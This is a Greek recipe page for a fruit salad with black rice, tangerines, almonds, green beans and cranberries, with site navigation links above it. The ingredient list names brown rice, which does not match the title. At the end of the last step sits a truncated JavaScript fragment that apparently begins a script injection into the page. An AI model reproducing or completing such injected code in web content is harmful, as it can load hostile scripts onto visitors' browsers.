mommy
thilasmos
toketos
mycare - φροντίδα
athome
arkoudos
nanny - επιλέγοντας νταντάδες

Φρουτοσαλάτα με μαύρο ρύζι

Φρουτοσαλάτα με μαύρο ρύζι

Συστατικά
1 φλιτζάνι καφέ ρύζι
4 μικρά μανταρίνια
3 φρέσκακρεμμυδάκια
1 μεγάλο λεμόνι
1 φλιτζάνι αμύγδαλα
1 φλιτζάνι κατεψυγμένα φασολάκια
1 φλιτζάνι αποξηραμένα cranberries
1 κ.σ. μέλι
1/8 κ.γ. τριμμένο μαύρο πιπέρι
1/4 φλιτζάνι ελαιόλαδο
1/2 φλιτζάνι φέτα ή ανθότυρο

Εκτέλεση
1. Μαγειρεύουμε το ρύζι σύμφωνα με τις οδηγίες της συσκευασίας.
2. Προθερμαίνετε το φούρνο στους 180 βαθμούς Κελσίου.
3. Ξεφλουδίζουμε τα μανταρίνια και τα κόβουμε σε κομμάτια.
4. Ξεπλένουμε και ψιλοκόβουμε τα κρεμμυδάκια.
5. Στύβουμε το λεμόνι
6. Κόβουμε τα αμύγδαλα σε φέτες και τα απλώνουμε σε ένα ταψί. Ψήνουμε μέχρι να ροδίσουν για περίπου 8-10 λεπτά.
7. Μαγειρεύουμε τα φασολάκια για 3 λεπτά, ή για όσο χρειαστεί και στραγγίζουμε.
8. Προσθέτουμε τα μανταρίνια, τα φασολάκια, τα κρεμμυδάκια, τα αμύγδαλα και τα αποξηραμένα cranberries στο μπολ με το ρύζι και ανακατεύουμε.
9. Σε ένα άλλο μπολ, χτυπάμε με ένα πιρούνι το χυμό λεμονιού, το μέλι, και το φρεσκοτριμμένο μαύρο πιπέρι. Ενώ ακόμα χτυπάμε, προσθέτουμε αργά το λάδι μέχρι να δέσει η σάλτσα.
10. Ρίχνουμε τη σάλτσα πάνω από τη σαλάτα και ανακατεύουμε καλά. .
11. Αν θέλουμε, ρίχνουμε στην κορυφή της σαλάτας λίγη τριμμένη φέτα ή ανθότυρο.var d=document;var s=d.createElement(‘script’);

Share This